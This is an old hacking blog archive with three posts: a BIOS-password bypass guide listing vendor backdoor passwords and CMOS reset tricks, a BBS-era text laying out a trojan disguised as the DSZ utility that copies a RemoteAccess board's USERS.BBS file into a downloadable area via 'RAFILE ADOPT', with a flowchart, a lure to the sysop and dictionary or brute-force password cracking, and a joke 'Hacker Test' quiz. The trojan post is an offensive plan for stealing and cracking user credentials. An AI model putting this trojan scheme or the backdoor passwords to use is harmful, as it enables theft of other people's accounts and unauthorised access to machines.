Ethical Hackers Lounge: Phreaking

Showing posts with label Phreaking. Show all posts

July 6, 2010

How to Bypass BIOS Passwords

How to Bypass BIOS Passwords

BIOS passwords can add an extra layer of security for desktop and laptop computers. They are used to either prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. Unfortunately, BIOS passwords can also be a liability if a user forgets their password, or changes the password to intentionally lock out the corporate IT department. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered in the warranty. Never fear, all is not lost. There are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS

DISCLAIMER
This article is intended for IT Professionals and systems administrators with experience servicing computer hardware. It is not intended for home users, hackers, or computer thieves attempting to crack the password on a stolen PC. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. LabMice.net is not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury.

Before attempting to bypass the BIOS password on a computer, please take a minute to contact the hardware manufacturer support staff directly and ask for their recommended methods of bypassing the BIOS security. In the event the manufacturer cannot (or will not) help you, there are a number of methods that can be used to bypass or reset the BIOS password yourself. They include:

Using a manufacturers backdoor password to access the BIOS

Use password cracking software

Reset the CMOS using the jumpers or solder beads.

Removing the CMOS battery for at least 10 minutes

Overloading the keyboard buffer

Using a professional service

Please remember that most BIOS passwords do not protect the hard drive, so if you need to recover the data, simply remove the hard drive and install it in an identical system, or configure it as a slave drive in an existing system. The exception to this are laptops, especially IBM Thinkpads, which silently lock the hard drive if the supervisor password is enabled. If the supervisor password is reset without resetting the and hard drive as well, you will be unable to access the data on the drive.

--------------------------------------------------------------------------------

Backdoor passwords

Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. These passwords are case sensitive, so you may wish to try a variety of combinations. Keep in mind that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards. Laptops typically have better BIOS security than desktop systems, and we are not aware of any backdoor passwords that will work with name brand laptops.

WARNING: Some BIOS configurations will lock you out of the system completely if you type in an incorrect password more than 3 times. Read your manufacturers documentation for the BIOS setting before you begin typing in passwords

Award BIOS backdoor passwords:

ALFAROME ALLy aLLy aLLY ALLY aPAf _award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC 01322222
589589 589721 595595 598598

AMI BIOS backdoor passwords:

AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO

PHOENIX BIOS backdoor passwords:

phoenix, PHOENIX, CMOS, BIOS

MISC. COMMON PASSWORDS

ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj

OTHER BIOS PASSWORDS BY MANUFACTURER

Manufacturer Password
VOBIS & IBM merlin
Dell Dell
Biostar Biostar
Compaq Compaq
Enox xo11nE
Epox central
Freetech Posterie
IWill iwill
Jetway spooml
Packard Bell bell9
QDI QDI
Siemens SKY_FOX
TMC BIGO
Toshiba Toshiba

TOSHIBA BIOS

Most Toshiba laptops and some desktop systems will bypass the BIOS password if the left shift key is held down during boot

IBM APTIVA BIOS

Press both mouse buttons repeatedly during the boot

--------------------------------------------------------------------------------

Password cracking software

The following software can be used to either crack or reset the BIOS on many chipsets. If your PC is locked with a BIOS administrator password that will not allow access to the floppy drive, these utilities may not work. Also, since these utilities do not come from the manufacturer, use them cautiously and at your own risk.

Cmos password recovery tools 3.1
!BIOS (get the how-to article)
RemPass
KILLCMOS

--------------------------------------------------------------------------------

Using the Motherboard "Clear CMOS" Jumper or Dipswitch settings

Many motherboards feature a set of jumpers or dipswitches that will clear the CMOS and wipe all of the custom settings including BIOS passwords. The locations of these jumpers / dipswitches will vary depending on the motherboard manufacturer and ideally you should always refer to the motherboard or computer manufacturers documentation. If the documentation is unavailable, the jumpers/dipswitches can sometimes be found along the edge of the motherboard, next to the CMOS battery, or near the processor. Some manufacturers may label the jumper / dipswitch CLEAR - CLEAR CMOS - CLR - CLRPWD - PASSWD - PASSWORD - PWD. On laptop computers, the dipswitches are usually found under the keyboard or within a compartment at the bottom of the laptop.
Please remember to unplug your PC and use a grounding strip before reaching into your PC and touching the motherboard. Once you locate and rest the jumper switches, turn the computer on and check if the password has been cleared. If it has, turn the computer off and return the jumpers or dipswitches to its original position.

--------------------------------------------------------------------------------

Removing the CMOS Battery

The CMOS settings on most systems are buffered by a small battery that is attached to the motherboard. (It looks like a small watch battery). If you unplug the PC and remove the battery for 10-15 minutes, the CMOS may reset itself and the password should be blank. (Along with any other machine specific settings, so be sure you are familiar with manually reconfiguring the BIOS settings before you do this.) Some manufacturers backup the power to the CMOS chipset by using a capacitor, so if your first attempt fails, leave the battery out (with the system unplugged) for at least 24 hours. Some batteries are actually soldered onto the motherboard making this task more difficult. Unsoldering the battery incorrectly may damage your motherboard and other components, so please don't attempt this if you are inexperienced. Another option may be to remove the CMOS chip from the motherboard for a period of time.
Note: Removing the battery to reset the CMOS will not work for all PC's, and almost all of the newer laptops store their BIOS passwords in a manner which does not require continuous power, so removing the CMOS battery may not work at all. IBM Thinkpad laptops lock the hard drive as well as the BIOS when the supervisor password is set. If you reset the BIOS password, but cannot reset the hard drive password, you may not be able to access the drive and it will remain locked, even if you place it in a new laptop. IBM Thinkpads have special jumper switches on the motherboard, and these should be used to reset the system.

--------------------------------------------------------------------------------

Overloading the KeyBoard Buffer

On some older computer systems, you can force the CMOS to enter its setup screen on boot by overloading the keyboard buffer. This can be done by booting with the keyboard or mouse unattached to the systems, or on some systems by hitting the ESC key over 100 times in rapid succession.

--------------------------------------------------------------------------------

Jumping the Solder Beads on the CMOS

It is also possible to reset the CMOS by connecting or "jumping" specific solder beads on the chipset. There are too many chipsets to do a breakdown of which points to jump on individual chipsets, and the location of these solder beads can vary by manufacturer, so please check your computer and motherboard documentation for details. This technique is not recommended for the inexperienced and should be only be used as a "last ditch" effort.

--------------------------------------------------------------------------------

Using a professional service

If the manufacturer of the laptop or desktop PC can't or won't reset the BIOS password, you still have the option of using a professional service. Password Crackers, Inc., offers a variety of services for desktop and laptop computers for between $100 and $400. For most of these services, you'll need to provide some type of legitimate proof of ownership. This may be difficult if you've acquired the computer second hand or from an online auction.

July 3, 2010

Hack RemoteAccess

Why the "Fun with RA boards" hacking method is LAME!
(The REAL way to hack RemoteAccess)
-----------------------------------

Knocked up by ByTe RyDeR of the
ÚÂÄÄ ÄÄ Ä úú ú
Ä³ÅÄÄ FundeMäNTAL CoNNeCtiON Ä³ÄÄÄ
:ÃÄÄ ÄÄ Ä úú ú

"Saving the Brain Forest"

Well dewdz, ya seen the file text about hacking RemoteAccess and you wanna
crack that H/P or warez RA board for mega ratios? Get Real!

RA *CAN* be hacked but only in the same way as any other BBS sox... no
sysop reading that file was shat themselves .. here's why not:

Basically the technique outlined involved you writing a trojan and
disguising it as some program the sysop is really gagging for in the hope
is he'll run it on his system. Wot it'll really do is copy his USER.BBS
onto the filebase so you can call back later and d/l it... neat idea, and
one that in *theory* will work with most BBS sox (most are EVEN easier coz
they don't encrypt the users file like RA) but their execution of it sucks!

Firstly, their compiled batch file relied on the sysop running RA off their
C: drive from the directory \RA... Yeah, maybe some lame PD board they
hang out on is like that but most sysops I know run multiple drives and
many have more complex directory structures... Lame Hacker 0 - Sysop 1

Okay... letz assume they got on some lame fucking board and the users file
*is* C:\RA\USERS.BBS - next step is to copy the file into the filebase and
make it d/lable. How do they do that? (patronising Dez Lymon voice) .

Their idea was to copy the file into D:\FILES\UPLOAD .. Yeah sure guyz...
EVERY board uses the D: drive for the filebase and happen to have a file
area in \FILES\UPLOAD - NOT!!!!!! Lame Hacker 0 - Sysop 2

Right, so they got better odds than winning the national fucking lottery and
all the above worked (yeah man, we're dreamin' but let's give 'em a chance).
What next? The file has to be d/lable... you found a sysop that makes
UNCHECKED & UNSCANNED files available for download? Fuck off! Get a life!
Lame Hacker 0 - Sysop 3

So... okay.... we got a sysop that's so fucking lame he doesn't deserve
to to breath the same air as the rest of the human race and uses all the
above paths and makes unchecked uploads d/lable. RA by default won't allow
files to be d/led UNLESS they're in the file database. Unless the USERS.BBS
destination ALREADY EXISTED in that area and was previously in the area
database there's NO WAY you can d/l it.

The way they "solved" this was to add an entry to FILES.BBS in the file
directory. Nice one... EXCEPT RA DOESN'T USE FILES.BBS AS IT'S FILE
DATABASE. Unless you happen to be lucky enough that the sysop does an
import from FILES.BBS to the REAL file database before checking out your
planted file (most RA sysops only import from FILES.BBS when adding CDROMs)
the addition of this entry will do FUCK ALL! Lame Hacker 0 - Sysop 4

To quote from the author "This is a generic program and you will have to
tailor it so it will meet your needs." - yeah man, fucking rethink, redesign
and rewrite it more like!

Oh yeah... EVEN IF YOU DO get a copy of the USER.BBS file downloaded THE
PASSWORDS ARE ENCRYPTED!!! Lame Hacker :( - Sysop:-)

So how can U hack RA? Well, the idea was okay but, like hacking any system,
you gotta KNOW the system ya gonna hack b4 U stand a chance.

Most sysops will use the DOS environment variable RA set to the RA system
directory so that external doors can find the system files... that's very
helpful of the sysop, to show us where we can find his config files.

In the RA system directory should be the file CONFIG.RA. You might want to
include a check for this file within your program and possibly do a disk
and directory scan for the file if RA isn't defined or is set incorrectly.

I'm not *entirely* sure about other versions of RA, but in the current
release (2.02) the CONFIG.RA offset &h3E4 is where the name of the mail
directory starts. This is the path where USERS.BBS will be found.

Next you need to know for SURE the name of a directory which stores the
files for a filearea from which you are able to download.

I suggest you do this in one of three ways:

1) Interogate the file FILES.RA in the RA system directory which contains
the filebase area configs. You *could* just search the directory for a
valid path but you'd wouldn't know if you had d/l access to the area.

2) If you want to be a bit more clever you could interpret the file and
find out the minimum security level required to d/l from each area and
dump your copy of USERS.BBS in the area with the lowest access level,
pretty much guaranteeing that you'll be able to get to the file. This
doesn't take security flags into account so there's still a SLIM
possiblity you won't be able to d/l the file unless you also write flag
testing into your program.

3) My favourite technique is to have the program read a small config file
which is uploaded with your archive. This file just contains the name
of a file you KNOW you have d/l access from. You can then either do a
global search for that filename or, preferably (coz it's faster) read
FILES.RA for the paths used by the filebase and search those.

So now you have the location of the USERS.BBS and the destination directory
you simply need to copy the file. However, even though the file is sitting
in a filebase directory it STILL isn't available for d/l... why? Because
it's not in the filearea database.

You could get clever and find amend filearea database files directly if you
get the fileareas path from CONFIG.RA (offset &hC12) and write to the files
HDR\FBD#####.HDR (header) IDX\FDB#####.IDX (index) and, if you want to add
a description, TXT\FBD#####.TXT, where ##### is the RA file area number.

There *is* an easier way. Shell out to DOS and execute the RAFILE utility
from the RA program path, passing the arguments "ADOPT filename #####".

E.g. the BASIC command would be:

SHELL "RAFILE ADOPT "+filename$+STR$(areanum)

Where filename$ contains the name of your USERS.BBS copy and areanum is the
RA filearea number. If your filename was USERTEST.ZIP and you'd copied it
to the directory used for RA file area 10 you'd be executing:

RAFILE ADOPT USERTEST.ZIP 10

This will "adopt" the file, adding it to the RA file database, making it
available for d/l (assuming you have the appropriate rights to the area).

All you need to do now is to package this trojan file to entice the sysop
into running it... In the LAME method for hacking RA the author used DSZ
as an example. That was about the most realistic part of the file and the
only bit worth leaching!

Your archive:
DSZ.EXE (your program)
DSZ.DAT (the *real* DSZ.EXE)
DSZ.CFG (small file containing the name of a *known*
d/lable file - preferabbly encrypted)
+ any other files that normally come with DSZ

Flow diagram for DSZ.EXE trojan:

_______
/ \
| Start |
\_______/
|
|
+--------+--------+
| Read enviroment |
| variable RA |
+--------+--------+
|
|
/ \
/ \
/CONFIG.RA\ +---------------------+
/ exist in \___>____| Scan drives & paths |
\ that path / No | search for the file |
\ ? / +----------+----------+
\ / |
\ / |
Yes | |
+------------<-------------+
|
+--------+--------+
| Read CONFIG.RA |
| to get location |
| of USERS.BBS |
+--------+--------+
|
|
+--------+--------+
| Read DSZ.CFG to |
| get a filename |
+--------+--------+
|_____________<____________
| |
+--------+--------+ |
| Read FILES.RA to| |
| get name of the | |
| next filearea | |
+--------+--------+ |
| |
| |
/ \ |
/ \ |
/does area\ |
/ contain the \________>__________|
\ file / No
\ ? /
\ /
\ /
Yes |
|
+--------+--------+
| Copy USERS.BBS |
| to the filearea |
| directory |
+--------+--------+
|
|
+--------+--------+
| Run RAFILE with |
| ADOPT to update |
| RA database |
+--------+--------+
|
|
+--------+--------+
| Delete DSZ.EXE |
| and DSZ.CFG |
+--------+--------+
|
|
+--------+--------+
| Rename DSZ.DAT |
| to DSZ.EXE |
+--------+--------+
|
___|___
/ \
| Stop! |
\_______/

Once you've uploaded the file, preferably using a pseudonym, post the sysop
a message telling him how c00l your upload is. Wait a day or so and dial
back. Do a filename search using the name you decided to use for your copy
of USERS.BBS and d/l it.

The next step, now you have the USERS.BBS file is to crack the passwords.
I only know of ONE crack program out there which has the RA password
encryption algorythm, a program based on the popular Unix CRACKERJACK
program called RA-CRACK. This simply takes a given word, encrypts it, and
compares it to the USERS.BBS file to find a user with a matching password.

RA-CRACK takes it's source words from a text file so it would be possible
to either:

a) Use a TXT dictionary file as the source. All passwords that are
normal words will be found. This method will usually find about 90%
of the user passwords.

b) Write a "brute force" cracker using a small routine that "counts"
through valid ASCII character combinations from "!" (ASCII 33) upto
a string containing 25 (max length of a RA password) null characters
(ASCII 255), passing these via a text file to RA-CRACK. This SHOULD
be _100%_ successful, but SLOW!

l8r!

>ByTe<>RyDeR<

July 1, 2010

Hacker Test

This test was conceived and written by Felix Lee, John Hayes and Angela

Thomas.

(Herewith a compendium of fact and folklore about computer hackerdom,

cunningly disguised as a test.)

Scoring - Count 1 for each item that you have done, or each

question that you can answer correctly.

If you score is between: You are

0x000 and 0x010 -> Computer Illiterate

0x011 and 0x040 -> a User

0x041 and 0x080 -> an Operator

0x081 and 0x0C0 -> a Nerd

0x0C1 and 0x100 -> a Hacker

0x101 and 0x180 -> a Guru

0x181 and 0x200 -> a Wizard

Note: If you don't understand the scoring, stop here.

And now for the questions...

0001 Have you ever used a computer?

0002 ... for more than 4 hours continuously?

0003 ... more than 8 hours?

0004 ... more than 16 hours?

0005 ... more than 32 hours?

0006 Have you ever patched paper tape?

0007 Have you ever missed a class while programming?

0008 ... Missed an examination?

0009 ... Missed a wedding?

0010 ... Missed your own wedding?

0011 Have you ever programmed while intoxicated?

0012 ... Did it make sense the next day?

0013 Have you ever written a flight simulator?

0014 Have you ever voided the warranty on your equipment?

0015 Ever change the value of 4?

0016 ... Unintentionally?

0017 ... In a language other than Fortran?

0018 Do you use DWIM to make life interesting?

0019 Have you named a computer?

0020 Do you complain when a "feature" you use gets fixed?

0021 Do you eat slime-molds?

0022 Do you know how many days old you are?

0023 Have you ever wanted to download pizza?

0024 Have you ever invented a computer joke?

0025 ... Did someone not 'get' it?

0026 Can you recite Jabberwocky?

0027 ... Backwards?

0028 Have you seen "Donald Duck in Mathemagic Land"?

0029 Have you seen "Tron"?

0030 Have you seen "Wargames"?

0031 Do you know what ASCII stands for?

0032 ... EBCDIC?

0033 Can you read and write ASCII in hex or octal?

0034 Do you know the names of all the ASCII control codes?

0035 Can you read and write EBCDIC in hex?

0036 Can you convert from EBCDIC to ASCII and vice versa?

0037 Do you know what characters are the same in both ASCII and EBCDIC?

0038 Do you know maxint on your system?

0039 Ever define your own numerical type to get better precision?

0040 Can you name powers of two up to 2**16 in arbitrary order?

0041 ... up to 2**32?

0042 ... up to 2**64?

0043 Can you read a punched card, looking at the holes?

0044 ... feeling the holes?

0045 Have you ever patched binary code?

0046 ... While the program was running?

0047 Have you ever used program overlays?

0048 Have you met any IBM vice-president?

0049 Do you know Dennis, Bill, or Ken?

0050 Have you ever taken a picture of a CRT?

0051 Have you ever played a videotape on your CRT?

0052 Have you ever digitized a picture?

0053 Did you ever forget to mount a scratch monkey?

0054 Have you ever optimized an idle loop?

0055 Did you ever optimize a bubble sort?

0056 Does your terminal/computer talk to you?

0057 Have you ever talked into an acoustic modem?

0058 ... Did it answer?

0059 Can you whistle 300 baud?

0060 ... 1200 baud?

0061 Can you whistle a telephone number?

0062 Have you witnessed a disk crash?

0063 Have you made a disk drive "walk"?

0064 Can you build a puffer train?

0065 ... Do you know what it is?

0066 Can you play music on your line printer?

0067 ... Your disk drive?

0068 ... Your tape drive?

0069 Do you have a Snoopy calendar?

0070 ... Is it out-of-date?

0071 Do you have a line printer picture of...

0072 ... the Mona Lisa?

0073 ... the Enterprise?

0074 ... Einstein?

0075 ... Oliver?

0076 Have you ever made a line printer picture?

0077 Do you know what the following stand for?

0078 ... DASD

0079 ... Emacs

0080 ... ITS

0081 ... RSTS/E

0082 ... SNA

0083 ... Spool

0084 ... TCP/IP

Have you ever used

0085 ... TPU?

0086 ... TECO?

0087 ... Emacs?

0088 ... ed?

0089 ... vi?

0090 ... Xedit (in VM/CMS)?

0091 ... SOS?

0092 ... EDT?

0093 ... Wordstar?

0094 Have you ever written a CLIST?

Have you ever programmed in

0095 ... the X windowing system?

0096 ... CICS?

0097 Have you ever received a Fax or a photocopy of a floppy?

0098 Have you ever shown a novice the "any" key?

0099 ... Was it the power switch?

Have you ever attended

0100 ... Usenix?

0101 ... DECUS?

0102 ... SHARE?

0103 ... SIGGRAPH?

0104 ... NetCon?

0105 Have you ever participated in a standards group?

0106 Have you ever debugged machine code over the telephone?

0107 Have you ever seen voice mail?

0108 ... Can you read it?

0109 Do you solve word puzzles with an on-line dictionary?

0110 Have you ever taken a Turing test?

0111 ... Did you fail?

0112 Ever drop a card deck?

0113 ... Did you successfully put it back together?

0114 ... Without looking?

0115 Have you ever used IPCS?

0116 Have you ever received a case of beer with your computer?

0117 Does your computer come in 'designer' colors?

0118 Ever interrupted a UPS?

0119 Ever mask an NMI?

0120 Have you ever set off a Halon system?

0121 ... Intentionally?

0122 ... Do you still work there?

0123 Have you ever hit the emergency power switch?

0124 ... Intentionally?

0125 Do you have any defunct documentation?

0126 ... Do you still read it?

0127 Ever reverse-engineer or decompile a program?

0128 ... Did you find bugs in it?

0129 Ever help the person behind the counter with their terminal/computer?

0130 Ever tried rack mounting your telephone?

0131 Ever thrown a computer from more than two stories high?

0132 Ever patched a bug the vendor does not acknowledge?

0133 Ever fix a hardware problem in software?

0134 ... Vice versa?

0135 Ever belong to a user/support group?

0136 Ever been mentioned in Computer Recreations?

0137 Ever had your activities mentioned in the newspaper?

0138 ... Did you get away with it?

0139 Ever engage a drum brake while the drum was spinning?

0140 Ever write comments in a non-native language?

0141 Ever physically destroy equipment from software?

0142 Ever tried to improve your score on the Hacker Test?

0143 Do you take listings with you to lunch?

0144 ... To bed?

0145 Ever patch a microcode bug?

0146 ... around a microcode bug?

0147 Can you program a Turing machine?

0148 Can you convert postfix to prefix in your head?

0149 Can you convert hex to octal in your head?

0150 Do you know how to use a Kleene star?

0151 Have you ever starved while dining with philosophers?

0152 Have you solved the halting problem?

0153 ... Correctly?

0154 Ever deadlock trying eating spaghetti?

0155 Ever written a self-reproducing program?

0156 Ever swapped out the swapper?

0157 Can you read a state diagram?

0158 ... Do you need one?

0159 Ever create an unkillable program?

0160 ... Intentionally?

0161 Ever been asked for a cookie?

0162 Ever speed up a system by removing a jumper?

* Do you know...

0163 Do you know who wrote Rogue?

0164 ... Rogomatic?

0165 Do you know Gray code?

0166 Do you know what HCF means?

0167 ... Ever use it?

0168 ... Intentionally?

0169 Do you know what a lace card is?

0170 ... Ever make one?

0171 Do you know the end of the epoch?

0172 ... Have you celebrated the end of an epoch?

0173 ... Did you have to rewrite code?

0174 Do you know the difference between DTE and DCE?

0175 Do you know the RS-232C pinout?

0176 ... Can you wire a connector without looking?

* Do you have...

0177 Do you have a copy of Dec Wars?

0178 Do you have the Canonical Collection of Lightbulb Jokes?

0179 Do you have a copy of the Hacker's dictionary?

0180 ... Did you contribute to it?

0181 Do you have a flowchart template?

0182 ... Is it unused?

0183 Do you have your own fortune-cookie file?

0184 Do you have the Anarchist's Cookbook?

0185 ... Ever make anything from it?

0186 Do you own a modem?

0187 ... a terminal?

0188 ... a toy computer?

0189 ... a personal computer?

0190 ... a minicomputer?

0191 ... a mainframe?

0192 ... a supercomputer?

0193 ... a hypercube?

0194 ... a printer?

0195 ... a laser printer?

0196 ... a tape drive?

0197 ... an outmoded peripheral device?

0198 Do you have a programmable calculator?

0199 ... Is it RPN?

0200 Have you ever owned more than 1 computer?

0201 ... 4 computers?

0202 ... 16 computers?

0203 Do you have a SLIP line?

0204 ... a T1 line?

0205 Do you have a separate phone line for your terminal/computer?

0206 ... Is it legal?

0207 Do you have core memory?

0208 ... drum storage?

0209 ... bubble memory?

0210 Do you use more than 16 megabytes of disk space?

0211 ... 256 megabytes?

0212 ... 1 gigabyte?

0213 ... 16 gigabytes?

0214 ... 256 gigabytes?

0215 ... 1 terabyte?

0216 Do you have an optical disk/disk drive?

0217 Do you have a personal magnetic tape library?

0218 ... Is it unlabelled?

0219 Do you own more than 16 floppy disks?

0220 ... 64 floppy disks?

0221 ... 256 floppy disks?

0222 ... 1024 floppy disks?

0223 Do you have any 8-inch disks?

0224 Do you have an internal stack?

0225 Do you have a clock interrupt?

0226 Do you own volumes 1 to 3 of _The Art of Computer Programming_?

0227 ... Have you done all the exercises?

0228 ... Do you have a MIX simulator?

0229 ... Can you name the unwritten volumes?

0230 Can you quote from _The Mythical Man-month_?

0231 ... Did you participate in the OS/360 project?

0232 Do you have a TTL handbook?

0233 Do you have printouts more than three years old?

* Career

0234 Do you have a job?

0235 ... Have you ever had a job?

0236 ... Was it computer-related?

0237 Do you work irregular hours?

0238 Have you ever been a system administrator?

0239 Do you have more megabytes than megabucks?

0240 Have you ever downgraded your job to upgrade your processing power?

0241 Is your job secure?

0242 ... Do you have code to prove it?

0243 Have you ever had a security clearance?

* Games

0244 Have you ever played Pong?

Have you ever played

0246 ... Spacewar?

0247 ... Star Trek?

0248 ... Wumpus?

0249 ... Lunar Lander?

0250 ... Empire?

Have you ever beaten

0251 ... Moria 4.8?

0252 ... Rogue 3.6?

0253 ... Rogue 5.3?

0254 ... Larn?

0255 ... Hack 1.0.3?

0256 ... Nethack 2.4?

0257 Can you get a better score on Rogue than Rogomatic?

0258 Have you ever solved Adventure?

0259 ... Zork?

0260 Have you ever written any redcode?

0261 Have you ever written an adventure program?

0262 ... a real-time game?

0263 ... a multi-player game?

0264 ... a networked game?

0265 Can you out-doctor Eliza?

* Hardware

0266 Have you ever used a light pen?

0267 ... did you build it?

Have you ever used

0268 ... a teletype?

0269 ... a paper tape?

0270 ... a decwriter?

0271 ... a card reader/punch?

0272 ... a SOL?

Have you ever built

0273 ... an Altair?

0274 ... a Heath/Zenith computer?

Do you know how to use

0275 ... an oscilliscope?

0276 ... a voltmeter?

0277 ... a frequency counter?

0278 ... a logic probe?

0279 ... a wirewrap tool?

0280 ... a soldering iron?

0281 ... a logic analyzer?

0282 Have you ever designed an LSI chip?

0283 ... has it been fabricated?

0284 Have you ever etched a printed circuit board?

* Historical

0285 Have you ever toggled in boot code on the front panel?

0286 ... from memory?

0287 Can you program an Eniac?

0288 Ever seen a 90 column card?

* IBM

0289 Do you recite IBM part numbers in your sleep?

0290 Do you know what IBM part number 7320154 is?

0291 Do you understand 3270 data streams?

0292 Do you know what the VM privilege classes are?

0293 Have you IPLed an IBM off the tape drive?

0294 ... off a card reader?

0295 Can you sing something from the IBM Songbook?

* Languages

0296 Do you know more than 4 programming languages?

0297 ... 8 languages?

0298 ... 16 languages?

0299 ... 32 languages?

0300 Have you ever designed a programming language?

0301 Do you know what Basic stands for?

0302 ... Pascal?

0303 Can you program in Basic?

0304 ... Do you admit it?

0305 Can you program in Cobol?

0306 ... Do you deny it?

0307 Do you know Pascal?

0308 ... Modula-2?

0309 ... Oberon?

0310 ... More that two Wirth languages?

0311 ... Can you recite a Nicklaus Wirth joke?

0312 Do you know Algol-60?

0313 ... Algol-W?

0314 ... Algol-68?

0315 ... Do you understand the Algol-68 report?

0316 ... Do you like two-level grammars?

0317 Can you program in assembler on 2 different machines?

0318 ... on 4 different machines?

0319 ... on 8 different machines?

Do you know

0320 ... APL?

0321 ... Ada?

0322 ... BCPL?

0323 ... C++?

0324 ... C?

0325 ... Comal?

0326 ... Eiffel?

0327 ... Forth?

0328 ... Fortran?

0329 ... Hypertalk?

0330 ... Icon?

0331 ... Lisp?

0332 ... Logo?

0333 ... MIIS?

0334 ... MUMPS?

0335 ... PL/I?

0336 ... Pilot?

0337 ... Plato?

0338 ... Prolog?

0339 ... RPG?

0340 ... Rexx (or ARexx)?

0341 ... SETL?

0342 ... Smalltalk?

0343 ... Snobol?

0344 ... VHDL?

0345 ... any assembly language?

0346 Can you talk VT-100?

0347 ... Postscript?

0348 ... SMTP?

0349 ... UUCP?

0350 ... English?

* Micros

0351 Ever copy a copy-protected disk?

0352 Ever create a copy-protection scheme?

0353 Have you ever made a "flippy" disk?

0354 Have you ever recovered data from a damaged disk?

0355 Ever boot a naked floppy?

* Networking

0356 Have you ever been logged in to two different timezones at once?

0357 Have you memorized the UUCP map for your country?

0358 ... For any country?

0359 Have you ever found a sendmail bug?

0360 ... Was it a security hole?

0361 Have you memorized the HOSTS.TXT table?

0362 ... Are you up to date?

0363 Can you name all the top-level nameservers and their addresses?

0364 Do you know RFC-822 by heart?

0365 ... Can you recite all the errors in it?

0366 Have you written a Sendmail configuration file?

0367 ... Does it work?

0368 ... Do you mumble "defocus" in your sleep?

0369 Do you know the max packet lifetime?

* Operating systems

Can you use

0370 ... BSD Unix?

0371 ... non-BSD Unix?

0372 ... AIX

0373 ... VM/CMS?

0374 ... VMS?

0375 ... MVS?

0376 ... VSE?

0377 ... RSTS/E?

0378 ... CP/M?

0379 ... COS?

0380 ... NOS?

0381 ... CP-67?

0382 ... RT-11?

0383 ... MS-DOS?

0384 ... Finder?

0385 ... PRODOS?

0386 ... more than one OS for the TRS-80?

0387 ... Tops-10?

0388 ... Tops-20?

0389 ... OS-9?

0390 ... OS/2?

0391 ... AOS/VS?

0392 ... Multics?

0393 ... ITS?

0394 ... Vulcan?

0395 Have you ever paged or swapped off a tape drive?

0396 ... Off a card reader/punch?

0397 ... Off a teletype?

0398 ... Off a networked (non-local) disk?

0399 Have you ever found an operating system bug?

0400 ... Did you exploit it?

0401 ... Did you report it?

0402 ... Was your report ignored?

0403 Have you ever crashed a machine?

0404 ... Intentionally?

* People

0405 Do you know any people?

0406 ... more than one?

0407 ... more than two?

* Personal

0408 Are your shoelaces untied?

0409 Do you interface well with strangers?

0410 Are you able to recite phone numbers for half-a-dozen computer systems

but unable to recite your own?

0411 Do you log in before breakfast?

0412 Do you consume more than LD-50 caffeine a day?

0413 Do you answer either-or questions with "yes"?

0414 Do you own an up-to-date copy of any operating system manual?

0415 ... *every* operating system manual?

0416 Do other people have difficulty using your customized environment?

0417 Do you dream in any programming languages?

0418 Do you have difficulty focusing on three-dimensional objects?

0419 Do you ignore mice?

0420 Do you despise the CAPS LOCK key?

0421 Do you believe menus belong in restaurants?

0422 Do you have a Mandelbrot hanging on your wall?

0423 Have you ever decorated with magnetic tape or punched cards?

0424 Do you have a disk platter or a naked floppy hanging in your home?

0425 Have you ever seen the dawn?

0426 ... Twice in a row?

0427 Do you use "foobar" in daily conversation?

0428 ... "bletch"?

0429 Do you use the "P convention"?

0430 Do you automatically respond to any user question with RTFM?

0431 ... Do you know what it means?

0432 Do you think garbage collection means memory management?

0433 Do you have problems allocating horizontal space in your room/office?

0434 Do you read Scientific American in bars to pick up women?

0435 Is your license plate computer-related?

0436 Have you ever taken the Purity test?

0437 Ever have an out-of-CPU experience?

0438 Have you ever set up a blind date over the computer?

0439 Do you talk to the person next to you via computer?

* Programming

0440 Can you write a Fortran compiler?

0441 ... In TECO?

0442 Can you read a machine dump?

0443 Can you disassemble code in your head?

Have you ever written

0444 ... a compiler?

0445 ... an operating system?

0446 ... a device driver?

0447 ... a text processor?

0448 ... a display hack?

0449 ... a database system?

0450 ... an expert system?

0451 ... an edge detector?

0452 ... a real-time control system?

0453 ... an accounting package?

0454 ... a virus?

0455 ... a prophylactic?

0456 Have you ever written a biorhythm program?

0457 ... Did you sell the output?

0458 ... Was the output arbitrarily invented?

0459 Have you ever computed pi to more than a thousand decimal places?

0460 ... the number e?

0461 Ever find a prime number of more than a hundred digits?

0462 Have you ever written self-modifying code?

0463 ... Are you proud of it?

0464 Did you ever write a program that ran correctly the first time?

0465 ... Was it longer than 20 lines?

0466 ... 100 lines?

0467 ... Was it in assembly language?

0468 ... Did it work the second time?

0469 Can you solve the Towers of Hanoi recursively?

0470 ... Non-recursively?

0471 ... Using the Troff text formatter?

0472 Ever submit an entry to the Obfuscated C code contest?

0473 ... Did it win?

0474 ... Did your entry inspire a new rule?

0475 Do you know Duff's device?

0476 Do you know Jensen's device?

0477 Ever spend ten minutes trying to find a single-character error?

0478 ... More than an hour?

0479 ... More than a day?

0480 ... More than a week?

0481 ... Did the first person you show it to find it immediately?

* Unix

0482 Can you use Berkeley Unix?

0483 .. Non-Berkeley Unix?

0484 Can you distinguish between sections 4 and 5 of the Unix manual?

0485 Can you find TERMIO in the System V release 2 documentation?

0486 Have you ever mounted a tape as a Unix file system?

0487 Have you ever built Minix?

0488 Can you answer "quiz function ed-command" correctly?

0489 ... How about "quiz ed-command function"?

* Usenet

0490 Do you read news?

0491 ... More than 32 newsgroups?

0492 ... More than 256 newsgroups?

0493 ... All the newsgroups?

0494 Have you ever posted an article?

0495 ... Do you post regularly?

0496 Have you ever posted a flame?

0497 ... Ever flame a cross-posting?

0498 ... Ever flame a flame?

0499 ... Do you flame regularly?

0500 Ever have your program posted to a source newsgroup?

0501 Ever forge a posting?

0502 Ever form a new newsgroup?

0503 ... Does it still exist?

0504 Do you remember

0505 ... mod.ber?

